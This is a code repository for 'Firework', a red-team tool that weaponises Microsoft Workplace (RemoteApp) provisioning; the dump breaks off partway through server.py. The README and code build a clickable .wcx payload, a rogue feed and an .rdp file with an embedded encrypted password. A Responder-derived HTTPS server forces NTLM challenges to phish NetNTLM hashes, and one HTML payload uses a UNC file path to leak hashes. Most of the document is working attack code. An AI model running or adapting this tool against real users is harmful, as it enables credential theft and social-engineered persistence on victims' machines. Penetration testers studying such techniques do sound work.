├── README.md
├── firework.ico
├── firework.py
├── requirements.txt
└── server.py


/README.md:
--------------------------------------------------------------------------------
  1 | :warning: *NOTE: This tool is no longer under active maintenance.*
  2 | 
  3 | 
  4 | # Firework
  5 | 
  6 | ![alt text](https://img.shields.io/badge/Python-2.7_only-blue.svg "Python 2.7 only")
  7 | 
  8 | Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. The tool also wraps some code from Responder to leverage its ability to capture NetNTLM hashes from a system that provisions a Workplace feed via it.
  9 | 
 10 | This tool may be used as part of a penetration test or red team exercise to create a .wcx payload (and associated feed) that if clicked on could be used to:
 11 | 
 12 | * Phish for credentials - NetNTLM hashes will be sent if a user enters their credentials (or on older versions of Windows automatically).
 13 | * Add items to the Start-Menu - After set-up shortcuts are added to the Start-Menu which launch the served RDP file(s). These entries could potentially be used as part of a wider social engineering campaign.
 14 | * Download resources - Resources such as the .rdp files and icon files are downloaded and updated by Windows on a daily basis (if authentication of the feed is disabled or is satisfied).
 15 | 
 16 | Read the SpiderLabs blog for a more detailed summary and walk through.
 17 | 
 18 | ## Installation
 19 | 
 20 | * Tested with Python 2.7.x. (Python3 not currently supported, although the main Firework class could be used in Python 3)
 21 | 
 22 | ```bash
 23 | $ pip install -r requirements.txt
 24 | ```
 25 | * The tool serves content over HTTPS and requires a certificate and private key to use in-built web server with NetNTLM capture. Default files: ***cert.crt*** and ***key.pem***
 26 | 
 27 | ## Usage
 28 | 
 29 | ```
 30 | 
 31 | .-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
 32 | ;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
 33 | [[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
 34 | `$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 35 |  888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 36 |  "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"
 37 | 
 38 | 
 39 | usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
 40 |                    [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
 41 |                    [-t CERT] [-k KEY]
 42 | 
 43 | WCX workplace tool
 44 | 
 45 | optional arguments:
 46 |   -h, --help            show this help message and exit
 47 |   -c COMPANY, --company COMPANY
 48 |                         Company name
 49 |   -u URL, --url URL     Feed URL
 50 |   -a APP, --app APP     App Name
 51 |   -e EXT, --ext EXT     App Extension
 52 |   -i ICON, --icon ICON  App Icon
 53 |   -l LISTEN, --listen LISTEN
 54 |                         TLS Web Server Port
 55 |   -r RDP, --rdp RDP     RDP Server
 56 |   -d DOMAIN, --domain DOMAIN
 57 |                         RDP Domain
 58 |   -n USERNAME, --username USERNAME
 59 |                         RDP Username
 60 |   -p PASSWORD, --password PASSWORD
 61 |                         RDP Password
 62 |   -t CERT, --cert CERT  SSL cert
 63 |   -k KEY, --key KEY     SSL key
 64 | 
 65 | ```
 66 | 
 67 | ## Examples
 68 | 
 69 | Basic example:
 70 | 
 71 | * Organisation Name: EvilCorp
 72 | * URL to feed XML (or URL to Firework's in-built server): https://example.org/ - This is where Windows downloads the feed from.
 73 | * Application Name: Firework
 74 | * File Extension: .fwk
 75 | * Icon File: firework.ico
 76 | 
 77 | ```bash
 78 | python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 
 79 | ```
 80 | 
 81 | In built web server will start on port 443 if **cert.crt** and **key.pem** are present in current directory. This will force an NTLM challenge with responder. If these files are not present the tool will write all files to local directory for your own hosting.
 82 | 
 83 | If you wish to start the in-built  web server on alternate port use the -l flag as below:
 84 | 
 85 | ```bash
 86 | python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
 87 | ```
 88 | 
 89 | You can also add some customisations to the .rdp file that gets served.
 90 | 
 91 | * Remote Desktop Server: dc.corp.local
 92 | * Domain: corp.local
 93 | * Username: admin
 94 | * Password Crypt: Encrypted password that gets included in RDP file
 95 | 
 96 | Note: Passwords stored in .rdp files are likely ignored in a default config.
 97 | 
 98 | ```bash
 99 | python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>
100 | ```
101 | 
102 | ## Payload
103 | 
104 | Having run the tool 'payload.wcx' will be written to current directory. This file is what when clicked on starts the provisioning process.
105 | 
106 | ## Authors
107 | * **David Middlehurst** - Twitter- [@dtmsecurity](https://twitter.com/dtmsecurity)
108 | 
109 | ## License
110 | 
111 | Firework
112 | 
113 | Created by David Middlehurst
114 | Copyright (C) 2018 Trustwave Holdings, Inc.
115 |  
116 | This program is free software: you can redistribute it and/or modify
117 | it under the terms of the GNU General Public License as published by
118 | the Free Software Foundation, either version 3 of the License, or
119 | (at your option) any later version.
120 | 
121 | This program is distributed in the hope that it will be useful,
122 | but WITHOUT ANY WARRANTY; without even the implied warranty of
123 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
124 | GNU General Public License for more details.
125 | 
126 | ## Acknowledgments
127 | 
128 | * [Responder by Laurent Gaffie](https://github.com/SpiderLabs/Responder)
129 | * [Firework Icon](https://icons8.com/icon/39296/firework-filled)
130 | 


--------------------------------------------------------------------------------
/firework.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SpiderLabs/Firework/25e61db5cbdceed8f5bbd5e409630704cd317e02/firework.ico


--------------------------------------------------------------------------------
/firework.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # Firework - Weaponising Microsoft Workplace (Remote App) provisioning
  3 | # David Middlehurst @dtmsecurity, SpiderLabs - Trustwave Holdings
  4 | #
  5 | # This program is free software: you can redistribute it and/or modify
  6 | # it under the terms of the GNU General Public License as published by
  7 | # the Free Software Foundation, either version 3 of the License, or
  8 | # (at your option) any later version.
  9 | #
 10 | # This program is distributed in the hope that it will be useful,
 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 13 | # GNU General Public License for more details.
 14 | #
 15 | # You should have received a copy of the GNU General Public License
 16 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 17 | 
 18 | 
 19 | import base64
 20 | from colorama import Fore, Back, Style
 21 | import uuid
 22 | from server import *
 23 | import os
 24 | import argparse
 25 | 
 26 | def banner():
 27 |     banner = "Li06Ojo6Oic6Ojo6Ojo6Ojo6Li4gIC4sOjo6Ojo6Ljo6ICAgIC4gICAuOjo6ICAuLi4gICAgOjo6Ojo6Oi4uICAgIDo6OiAgLiAgIAo7OzsnJycnIDs7Ozs7OztgYDs7OzsgOzs7OycnJycnOzssICA7OyAgOzs7Jy47Ozs7Ozs7LiA7Ozs7YGA7Ozs7ICAgOzs7IC47OywuCltbWywsPT0gW1tbIFtbWywvW1tbJyAgW1tjY2NjICAnW1ssIFtbLCBbWycsW1sgICAgIFxbWyxbW1ssL1tbWycgICBbW1tbWy8nICAKYCQkJCJgYCAkJCQgJCQkJCQkYyAgICAkJCIiIiIgICAgWSRjJCQkYyRQICQkJCwgICAgICQkJCQkJCQkJGMgICAgXyQkJCQsICAgIAogODg4ICAgIDg4OCA4ODhiICI4OGJvLDg4OG9vLF9fICAgIjg4Ijg4OCAgIjg4OCxfIF8sODhQODg4YiAiODhibywiODg4Ijg4bywgCiAiTU0sICAgTU1NIE1NTU0gICAiVyIgIiIiIllVTU1NICAgIk0gIk0iICAgICJZTU1NTU1QIiBNTU1NICAgIlciICBNTU0gIk1NUCIK"
 28 |     print("")
 29 |     print(Fore.GREEN + base64.b64decode(banner).decode('utf8'))
 30 |     print(Style.RESET_ALL)
 31 | 
 32 | 
 33 | class Firework:
 34 |     def __init__(self):
 35 |         self.hostedFiles = dict()
 36 |         self.company = "Secure App"
 37 |         self.feedUrl = "https://example.org/"
 38 |         self.wcx = ""
 39 |         self.apps = []
 40 |         self.feed = ""
 41 |         self.domain = "domain"
 42 |         self.username = "administrator"
 43 |         self.password = "01000000D08C9DDF0115D1118C7A00C04FC297EB010000000DB88E9C2974C24FA234CC2EC7D4E8BE00000000080000007000730077000000106600000001000020000000CBCD31921BDC991973C2127EED86EF467994D90311A8158C413147C5550DE9A8000000000E8000000002000020000000F8E18317CEC0F970F3531BD913CAB91BFFCD9BD3D8DFC26999EA21AA46D20CDD2000000047A7E071B141B3973667E70696E2A203D3400E54C88C9A866E4BE4D44C1B5D49400000007BC7BC835F2B6C2318D6662C63FE9955D1B282CBF4B84591258E1A5B4C199306F999D492226222F1A4B63ABFAA20C7877C8B2850BC9E88C14A6297D5C4C67EC9"
 44 |         self.server = "192.168.1.1"
 45 |         self.rdp = ""
 46 | 
 47 |     def generateWcx(self):
 48 |         self.wcx = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\n"
 49 |         self.wcx += "<workspace name=\"%s Remote Access\" xmlns=\"http://schemas.microsoft.com/ts/2008/09/tswcx\" xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n" % (self.company)
 50 |         self.wcx += "<defaultFeed url=\"%s\" />\n" % (self.feedUrl)
 51 |         self.wcx += "</workspace>\n"
 52 | 
 53 |     def addApp(self,appName,executableName,fileExtension,iconFile):
 54 |         appGuid = str(uuid.uuid4())
 55 | 
 56 |         iconPath = "/%s.ico" % (appGuid)
 57 | 
 58 |         fh = open(iconFile,"rb")
 59 |         self.hostedFiles[iconPath] = base64.b64encode(fh.read())
 60 |         fh.close()
 61 | 
 62 |         rdpPath = "/%s.rdp" % (appGuid)
 63 |         rdpContent = self.rdp
 64 |         self.hostedFiles[rdpPath] = rdpContent
 65 | 
 66 |         newApp = "<Resource ID=\"%s\" Alias=\"%s\" Title=\"%s\" LastUpdated=\"2009-07-09T17:57:12.588625Z\" Type=\"RemoteApp\" ExecutableName=\"%s\">\n" % (appGuid,appName,appName,executableName)
 67 |         newApp += "<Icons>\n<IconRaw FileType=\"ico\" FileURL=\"%s\" />\n</Icons>\n" % (iconPath)
 68 |         newApp += "<FileExtensions>\n"
 69 |         newApp += "<FileExtension Name=\"%s\" />\n" % (fileExtension)
 70 |         newApp += "</FileExtensions>\n"
 71 |         newApp += "<HostingTerminalServers>\n"
 72 |         newApp += "<HostingTerminalServer>\n"
 73 |         newApp += "<ResourceFile FileExtension=\".rdp\" URL=\"%s\" />\n" % (rdpPath)
 74 |         newApp += "<TerminalServerRef Ref=\"Contoso\" />\n"
 75 |         newApp += "</HostingTerminalServer>\n"
 76 |         newApp += "</HostingTerminalServers>\n"
 77 |         newApp += "</Resource>\n"
 78 |         self.apps.append(newApp)
 79 | 
 80 |     def generateFeed(self):
 81 |         self.feed = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
 82 |         self.feed += "<ResourceCollection PubDate=\"2009-07-09T17:57:30.323Z\" SchemaVersion=\"1.1\" xmlns=\"http://schemas.microsoft.com/ts/2007/05/tswf\">\n"
 83 |         self.feed += "<Publisher LastUpdated=\"2009-07-09T17:57:12.588625Z\" Name=\"%s\" ID=\"Contoso\" Description=\"\">\n" % (self.company)
 84 |         self.feed += "<Resources>\n"
 85 |         for app in self.apps:
 86 |             self.feed += app
 87 |         self.feed += "</Resources>\n"
 88 |         self.feed += "<TerminalServers>\n"
 89 |         self.feed += "<TerminalServer ID=\"Contoso\" Name=\"Contoso\" LastUpdated=\"2009-07-09T17:57:12.588625Z\" />\n"
 90 |         self.feed += "</TerminalServers>\n"
 91 |         self.feed += "</Publisher>\n</ResourceCollection>\n"
 92 |         self.hostedFiles["/"] = self.feed
 93 | 
 94 |     def generateRdp(self):
 95 |         self.rdp += "screen mode id:i:2\r\n"
 96 |         self.rdp += "use multimon:i:1\r\n"
 97 |         self.rdp += "desktopwidth:i:800\r\n"
 98 |         self.rdp += "desktopheight:i:600\r\n"
 99 |         self.rdp += "session bpp:i:32\r\n"
100 |         self.rdp += "winposstr:s:0,3,0,0,800,600\r\n"
101 |         self.rdp += "compression:i:1\r\n"
102 |         self.rdp += "keyboardhook:i:2\r\n"
103 |         self.rdp += "audiocapturemode:i:0\r\n"
104 |         self.rdp += "videoplaybackmode:i:1\r\n"
105 |         self.rdp += "connection type:i:7\r\n"
106 |         self.rdp += "networkautodetect:i:1\r\n"
107 |         self.rdp += "bandwidthautodetect:i:1\r\n"
108 |         self.rdp += "displayconnectionbar:i:1\r\n"
109 |         self.rdp += "domain:s:%s\r\n" % (self.domain)
110 |         self.rdp += "username:s:%s\r\n" % (self.username)
111 |         self.rdp += "password 51:b:%s\r\n" % (self.password)
112 |         self.rdp += "enableworkspacereconnect:i:0\r\n"
113 |         self.rdp += "disable wallpaper:i:0\r\n"
114 |         self.rdp += "allow font smoothing:i:0\r\n"
115 |         self.rdp += "allow desktop composition:i:0\r\n"
116 |         self.rdp += "disable full window drag:i:1\r\n"
117 |         self.rdp += "disable menu anims:i:1\r\n"
118 |         self.rdp += "disable themes:i:0\r\n"
119 |         self.rdp += "disable cursor setting:i:0\r\n"
120 |         self.rdp += "bitmapcachepersistenable:i:1\r\n"
121 |         self.rdp += "full address:s:%s\r\n" % (self.server)
122 |         self.rdp += "audiomode:i:0\r\n"
123 |         self.rdp += "redirectprinters:i:1\r\n"
124 |         self.rdp += "redirectcomports:i:1\r\n"
125 |         self.rdp += "redirectsmartcards:i:1\r\n"
126 |         self.rdp += "redirectclipboard:i:1\r\n"
127 |         self.rdp += "redirectposdevices:i:0\r\n"
128 |         self.rdp += "camerastoredirect:s:*\r\n"
129 |         self.rdp += "devicestoredirect:s:*\r\n"
130 |         self.rdp += "drivestoredirect:s:*\r\n"
131 |         self.rdp += "autoreconnection enabled:i:1\r\n"
132 |         self.rdp += "authentication level:i:1\r\n"
133 |         self.rdp += "prompt for credentials:i:0\r\n"
134 |         self.rdp += "prompt for credentials on client:i:0\r\n"
135 |         self.rdp += "negotiate security layer:i:1\r\n"
136 |         self.rdp += "remoteapplicationmode:i:0\r\n"
137 |         self.rdp += "alternate shell:s:\r\n"
138 |         self.rdp += "shell working directory:s:\r\n"
139 |         self.rdp += "gatewayhostname:s:\r\n"
140 |         self.rdp += "gatewayusagemethod:i:4\r\n"
141 |         self.rdp += "gatewaycredentialssource:i:4\r\n"
142 |         self.rdp += "gatewayprofileusagemethod:i:0\r\n"
143 |         self.rdp += "promptcredentialonce:i:1\r\n"
144 |         self.rdp += "gatewaybrokeringtype:i:0\r\n"
145 |         self.rdp += "use redirection server name:i:0\r\n"
146 |         self.rdp += "rdgiskdcproxy:i:0\r\n"
147 |         self.rdp += "kdcproxyname:s:\r\n"
148 | 
149 | def main():
150 |     banner()
151 | 
152 |     parser = argparse.ArgumentParser(description='WCX workplace tool')
153 |     parser.add_argument('-c','--company', help='Company name', required=True)
154 |     parser.add_argument('-u','--url', help='Feed URL', required=True)
155 |     parser.add_argument('-a','--app', help='App Name', required=True)
156 |     parser.add_argument('-e','--ext', help='App Extension', required=True)
157 |     parser.add_argument('-i','--icon', help='App Icon', required=True)
158 |     parser.add_argument('-l','--listen', help='TLS Web Server Port')
159 |     parser.add_argument('-r','--rdp', help='RDP Server')
160 |     parser.add_argument('-d','--domain', help='RDP Domain')
161 |     parser.add_argument('-n','--username', help='RDP Username')
162 |     parser.add_argument('-p','--password', help='RDP Password')
163 |     parser.add_argument('-t','--cert', help='SSL cert')
164 |     parser.add_argument('-k','--key', help='SSL key')
165 |     args = parser.parse_args()
166 | 
167 |     f = Firework()
168 | 
169 |     if args.company is not None:
170 |         f.company = str(args.company)
171 |     if args.url is not None:
172 |         f.feedUrl = str(args.url)
173 |     if args.rdp is not None:
174 |         f.server = str(args.rdp)
175 |     if args.domain is not None:
176 |         f.domain = str(args.domain)
177 |     if args.username is not None:
178 |         f.username = str(args.username)
179 |     if args.password is not None:
180 |         f.password = str(args.password)
181 | 
182 |     f.generateWcx()
183 | 
184 |     fh = open("payload.wcx","w")
185 |     fh.write(f.wcx)
186 |     fh.close()
187 |     print(Fore.GREEN + "Written: " + Style.RESET_ALL + "payload.wcx")
188 | 
189 |     f.generateRdp()
190 | 
191 | 
192 |     f.addApp(str(args.app),"%s.exe" % str(args.app), str(args.ext), str(args.icon))
193 |     #f.addApp("Word","word.exe",".doc","./excel.ico")
194 |     f.generateFeed()
195 | 
196 |     fh = open("feed.xml","w")
197 |     fh.write(f.feed)
198 |     fh.close()
199 | 
200 |     print(Fore.GREEN + "Written: " + Style.RESET_ALL + "feed.xml")
201 | 
202 |     hosted = f.hostedFiles
203 | 
204 |     if args.listen is not None:
205 |         port = int(args.listen)
206 |     else:
207 |         port = 443
208 | 
209 |     cert = "cert.crt"
210 |     key = "key.pem"
211 | 
212 |     if args.cert is not None:
213 |         cert = str(args.cert)
214 |     if args.key is not None:
215 |         key = str(args.key)
216 | 
217 |     if os.path.isfile(cert) and os.path.isfile(key):
218 |         print(Fore.GREEN + "Starting server: " + Style.RESET_ALL + "https://0.0.0.0/")
219 |         serve_thread_SSL('', port, HTTPS, hosted, cert, key, )
220 |     else:
221 |         print(Fore.RED + "Failed to start server: " + Style.RESET_ALL + ("'%s' and '%s' not present - Writing resources to disk instead" % (cert,key)))
222 |         for file in hosted:
223 |             if file != "/":
224 |                 print(Fore.GREEN + "Written: " + Style.RESET_ALL + file)
225 |                 fh = open(os.path.join(os.getcwd(),".%s" % file),"w")
226 |                 fh.write(hosted[file])
227 |                 fh.close()
228 | 
229 | if __name__ == '__main__':
230 |     main()
231 | 
232 | 
233 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | colorama==0.3.9
2 | 


--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/env python
   2 | # This file is mainly cobblled together from Responder (https://github.com/SpiderLabs/Responder)
   3 | # Original work by Laurent Gaffie - Trustwave Holdings
   4 | #
   5 | # This program is free software: you can redistribute it and/or modify
   6 | # it under the terms of the GNU General Public License as published by
   7 | # the Free Software Foundation, either version 3 of the License, or
   8 | # (at your option) any later version.
   9 | #
  10 | # This program is distributed in the hope that it will be useful,
  11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
  12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13 | # GNU General Public License for more details.
  14 | #
  15 | # You should have received a copy of the GNU General Public License
  16 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17 | 
  18 | from SocketServer import BaseRequestHandler, StreamRequestHandler, TCPServer, UDPServer, ThreadingMixIn
  19 | import struct
  20 | from threading import Thread
  21 | import optparse
  22 | import ssl
  23 | import struct
  24 | from base64 import b64decode, b64encode
  25 | from UserDict import DictMixin
  26 | import time
  27 | import socket
  28 | import re
  29 | import os
  30 | 
  31 | hostedFiles = dict()
  32 | 
  33 | class OrderedDict(dict, DictMixin):
  34 | 
  35 |     def __init__(self, *args, **kwds):
  36 |         if len(args) > 1:
  37 |             raise TypeError('expected at most 1 arguments, got %d' % len(args))
  38 |         try:
  39 |             self.__end
  40 |         except AttributeError:
  41 |             self.clear()
  42 |         self.update(*args, **kwds)
  43 | 
  44 |     def clear(self):
  45 |         self.__end = end = []
  46 |         end += [None, end, end]
  47 |         self.__map = {}
  48 |         dict.clear(self)
  49 | 
  50 |     def __setitem__(self, key, value):
  51 |         if key not in self:
  52 |             end = self.__end
  53 |             curr = end[1]
  54 |             curr[2] = end[1] = self.__map[key] = [key, curr, end]
  55 |         dict.__setitem__(self, key, value)
  56 | 
  57 |     def __delitem__(self, key):
  58 |         dict.__delitem__(self, key)
  59 |         key, prev, next = self.__map.pop(key)
  60 |         prev[2] = next
  61 |         next[1] = prev
  62 | 
  63 |     def __iter__(self):
  64 |         end = self.__end
  65 |         curr = end[2]
  66 |         while curr is not end:
  67 |             yield curr[0]
  68 |             curr = curr[2]
  69 | 
  70 |     def __reversed__(self):
  71 |         end = self.__end
  72 |         curr = end[1]
  73 |         while curr is not end:
  74 |             yield curr[0]
  75 |             curr = curr[1]
  76 | 
  77 |     def popitem(self, last=True):
  78 |         if not self:
  79 |             raise KeyError('dictionary is empty')
  80 |         if last:
  81 |             key = reversed(self).next()
  82 |         else:
  83 |             key = iter(self).next()
  84 |         value = self.pop(key)
  85 |         return key, value
  86 | 
  87 |     def __reduce__(self):
  88 |         items = [[k, self[k]] for k in self]
  89 |         tmp = self.__map, self.__end
  90 |         del self.__map, self.__end
  91 |         inst_dict = vars(self).copy()
  92 |         self.__map, self.__end = tmp
  93 |         if inst_dict:
  94 |             return self.__class__, (items,), inst_dict
  95 |         return self.__class__, (items,)
  96 | 
  97 |     def keys(self):
  98 |         return list(self)
  99 | 
 100 |     setdefault = DictMixin.setdefault
 101 |     update = DictMixin.update
 102 |     pop = DictMixin.pop
 103 |     values = DictMixin.values
 104 |     items = DictMixin.items
 105 |     iterkeys = DictMixin.iterkeys
 106 |     itervalues = DictMixin.itervalues
 107 |     iteritems = DictMixin.iteritems
 108 | 
 109 |     def __repr__(self):
 110 |         if not self:
 111 |             return '%s()' % (self.__class__.__name__,)
 112 |         return '%s(%r)' % (self.__class__.__name__, self.items())
 113 | 
 114 |     def copy(self):
 115 |         return self.__class__(self)
 116 | 
 117 |     @classmethod
 118 |     def fromkeys(cls, iterable, value=None):
 119 |         d = cls()
 120 |         for key in iterable:
 121 |             d[key] = value
 122 |         return d
 123 | 
 124 |     def __eq__(self, other):
 125 |         if isinstance(other, OrderedDict):
 126 |             return len(self)==len(other) and \
 127 |                    min(p==q for p, q in  zip(self.items(), other.items()))
 128 |         return dict.__eq__(self, other)
 129 | 
 130 |     def __ne__(self, other):
 131 |         return not self == other
 132 | 
 133 | class Packet():
 134 |     fields = OrderedDict([
 135 |         ("data", ""),
 136 |     ])
 137 |     def __init__(self, **kw):
 138 |         self.fields = OrderedDict(self.__class__.fields)
 139 |         for k,v in kw.items():
 140 |             if callable(v):
 141 |                 self.fields[k] = v(self.fields[k])
 142 |             else:
 143 |                 self.fields[k] = v
 144 |     def __str__(self):
 145 |         return "".join(map(str, self.fields.values()))
 146 | 
 147 | ##### HTTP Packets #####
 148 | class NTLM_Challenge(Packet):
 149 |     fields = OrderedDict([
 150 |         ("Signature",        "NTLMSSP"),
 151 |         ("SignatureNull",    "\x00"),
 152 |         ("MessageType",      "\x02\x00\x00\x00"),
 153 |         ("TargetNameLen",    "\x06\x00"),
 154 |         ("TargetNameMaxLen", "\x06\x00"),
 155 |         ("TargetNameOffset", "\x38\x00\x00\x00"),
 156 |         ("NegoFlags",        "\x05\x02\x89\xa2"),
 157 |         ("ServerChallenge",  ""),
 158 |         ("Reserved",         "\x00\x00\x00\x00\x00\x00\x00\x00"),
 159 |         ("TargetInfoLen",    "\x7e\x00"),
 160 |         ("TargetInfoMaxLen", "\x7e\x00"),
 161 |         ("TargetInfoOffset", "\x3e\x00\x00\x00"),
 162 |         ("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
 163 |         ("TargetNameStr",    "SMB"),
 164 |         ("Av1",              "\x02\x00"),#nbt name
 165 |         ("Av1Len",           "\x06\x00"),
 166 |         ("Av1Str",           "SMB"),
 167 |         ("Av2",              "\x01\x00"),#Server name
 168 |         ("Av2Len",           "\x14\x00"),
 169 |         ("Av2Str",           "SMB-TOOLKIT"),
 170 |         ("Av3",              "\x04\x00"),#Full Domain name
 171 |         ("Av3Len",           "\x12\x00"),
 172 |         ("Av3Str",           "smb.local"),
 173 |         ("Av4",              "\x03\x00"),#Full machine domain name
 174 |         ("Av4Len",           "\x28\x00"),
 175 |         ("Av4Str",           "server2003.smb.local"),
 176 |         ("Av5",              "\x05\x00"),#Domain Forest Name
 177 |         ("Av5Len",           "\x12\x00"),
 178 |         ("Av5Str",           "smb.local"),
 179 |         ("Av6",              "\x00\x00"),#AvPairs Terminator
 180 |         ("Av6Len",           "\x00\x00"),
 181 |     ])
 182 | 
 183 |     def calculate(self):
 184 |         # First convert to unicode
 185 |         self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
 186 |         self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
 187 |         self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
 188 |         self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
 189 |         self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
 190 |         self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
 191 | 
 192 |         # Then calculate
 193 |         CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
 194 |         CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
 195 |         CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
 196 | 
 197 |         # Target Name Offsets
 198 |         self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
 199 |         self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
 200 |         self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
 201 |         # AvPairs Offsets
 202 |         self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
 203 |         self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
 204 |         self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
 205 |         # AvPairs StrLen
 206 |         self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
 207 |         self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
 208 |         self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
 209 |         self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
 210 |         self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
 211 | 
 212 | class IIS_Auth_401_Ans(Packet):
 213 |     fields = OrderedDict([
 214 |         ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
 215 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 216 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 217 |         ("Type",          "Content-Type: text/html\r\n"),
 218 |         ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 219 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 220 |         ("Len",           "Content-Length: 0\r\n"),
 221 |         ("ConnClose",     "Connection: close\r\n"),
 222 |         ("CRLF",          "\r\n"),
 223 |     ])
 224 | 
 225 | class IIS_Auth_Granted(Packet):
 226 |     fields = OrderedDict([
 227 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 228 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 229 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 230 |         ("Type",          "Content-Type: text/html\r\n"),
 231 |         ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 232 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 233 |         ("ContentLen",    "Content-Length: "),
 234 |         ("ActualLen",     "76"),
 235 |         ("CRLF",          "\r\n\r\n"),
 236 |         ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
 237 |     ])
 238 |     def calculate(self):
 239 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 240 | class IIS_XML(Packet):
 241 |     fields = OrderedDict([
 242 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 243 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 244 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 245 |         ("Type",          "Content-Type: text/xml\r\n"),
 246 |         ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 247 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 248 |         ("ContentLen",    "Content-Length: "),
 249 |         ("ActualLen",     "76"),
 250 |         ("ConnClose",     "\r\nConnection: close\r\n"),
 251 |         ("CRLF",          "\r\n"),
 252 |         ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
 253 |     ])
 254 |     def calculate(self):
 255 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 256 | 
 257 | class IIS_ICO(Packet):
 258 |     fields = OrderedDict([
